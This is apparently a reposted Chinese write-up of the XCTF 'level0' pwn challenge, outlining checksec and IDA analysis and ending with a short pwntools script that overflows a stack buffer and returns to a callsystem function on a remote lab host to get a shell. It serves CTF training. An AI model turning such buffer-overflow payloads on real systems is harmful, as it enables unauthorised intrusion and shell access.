攻防世界—pwn—level0

题目分析

下载文件后首先使用checksec检查文件保护机制

文件名太长了,就更改了一下

发现是一个64位程序,使用ida查看伪代码

注意到一个特殊的函数名callsystem

确定思路,直接栈溢出

信息收集

确定偏移量

/bin/sh地址

方法1

方法2

编写脚本

from pwn import *

p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()

本地测试

靶机测试


猜你喜欢

转载自www.cnblogs.com/anweilx/p/12628337.html